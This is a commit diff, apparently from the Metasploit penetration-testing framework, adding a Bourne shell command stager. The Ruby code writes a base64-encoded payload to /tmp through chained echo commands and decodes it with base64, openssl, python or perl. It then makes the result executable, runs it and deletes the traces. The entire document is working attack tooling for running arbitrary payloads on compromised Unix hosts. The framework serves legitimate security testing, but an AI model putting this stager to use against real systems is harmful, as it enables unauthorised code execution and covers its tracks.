Initial commit of the Bourne shell command stager, nothing uses it yet.

zeroSteiner · zeroSteiner · commit 7aed6e44e13d · 2013-01-02T13:28:08.000-05:00
diff --git a/lib/msf/core/exploit/cmdstager_bourne.rb b/lib/msf/core/exploit/cmdstager_bourne.rb
@@ -0,0 +1,43 @@
+# -*- coding: binary -*-
+##
+# $Id: cmdstager_bourne.rb
+##
+
+require 'msf/core/exploit/cmdstager'
+
+module Msf
+
+###
+#
+# This mixin provides an interface for staging cmd to arbitrary payloads
+#
+###
+module Exploit::CmdStagerBourne
+
+	include Msf::Exploit::CmdStager
+
+	def initialize(info = {})
+		super
+
+		register_advanced_options(
+			[
+				OptString.new( 'DECODER',  [ true, 'The decoding binary to use.', 'base64']),
+			], self.class)
+	end
+
+	def create_stager(exe)
+		Rex::Exploitation::CmdStagerBourne.new(exe)
+	end
+
+	def generate_cmdstager(opts = {}, pl = nil)
+		opts.merge!({ :decoder => datastore['DECODER'] })
+		available_decoders = ['base64', 'openssl', 'python', 'perl']
+		if not available_decoders.include?(opts[:decoder])
+			print_error("Decoder must be one of #{available_decoders.join(', ')}")
+			raise ArgumentError
+		end
+		super
+	end
+end
+
+end
diff --git a/lib/rex/exploitation/cmdstager/bourne.rb b/lib/rex/exploitation/cmdstager/bourne.rb
@@ -0,0 +1,106 @@
+# -*- coding: binary -*-
+##
+# $Id: bourne.rb 12595 2011-05-12 18:33:49Z zeroSteiner $
+##
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+class CmdStagerBourne < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@var_encoded = Rex::Text.rand_text_alpha(5)
+		@var_decoded = Rex::Text.rand_text_alpha(5)
+		@decoder     = nil # filled in later
+	end
+
+	def generate(opts = {})
+		opts.merge!({:temp => '/tmp/'})
+		super
+	end
+
+	#
+	# Override just to set the extra byte count
+	#
+	def generate_cmds(opts)
+		# Set the start/end of the commands here (vs initialize) so we have @tempdir
+		@cmd_start = "echo "
+		@cmd_end   = ">>#{@tempdir}#{@var_encoded}.b64"
+		xtra_len = @cmd_start.length + @cmd_end.length + 1
+		opts.merge!({ :extra => xtra_len })
+		super
+	end
+
+
+	#
+	# Simple base64...
+	#
+	def encode_payload(opts)
+		Rex::Text.encode_base64(@exe)
+	end
+
+
+	#
+	# Combine the parts of the encoded file with the stuff that goes
+	# before / after it.
+	#
+	def parts_to_commands(parts, opts)
+
+		cmds = []
+		parts.each do |p|
+			cmd = ''
+			cmd << @cmd_start
+			cmd << p
+			cmd << @cmd_end
+			cmds << cmd
+		end
+
+		cmds
+	end
+
+
+	#
+	# Generate the commands that will decode the file we just created
+	#
+	def generate_cmds_decoder(opts)
+		case opts[:decoder]
+		when 'base64'
+			decoder = "base64 -d #{@tempdir}#{@var_encoded}.b64"
+		when 'openssl'
+			decoder = "openssl enc -d -A -base64 -in #{@tempdir}#{@var_encoded}.b64"
+		when 'python'
+			decoder = "python -c 'import sys; import base64; print base64.standard_b64decode(sys.stdin.read());' < #{@tempdir}#{@var_encoded}.b64"
+		when 'perl'
+			decoder = "perl -MIO -e 'use MIME::Base64; print decode_base64(<>);' < #{@tempdir}#{@var_encoded}.b64"
+		end
+		decoder << " > #{@tempdir}#{@var_decoded}.bin"
+		[ decoder ]
+	end
+
+	def compress_commands(cmds, opts)
+		# Make it all happen
+		cmds << "chmod +x #{@tempdir}#{@var_decoded}.bin"
+		cmds << "#{@tempdir}#{@var_decoded}.bin"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			cmds << "rm -f #{@tempdir}#{@var_decoded}.bin"
+			cmds << "rm -f #{@tempdir}#{@var_encoded}.b64"
+		end
+
+		super
+	end
+
+	def cmd_concat_operator
+		" ; "
+	end
+
+end
+end
+end
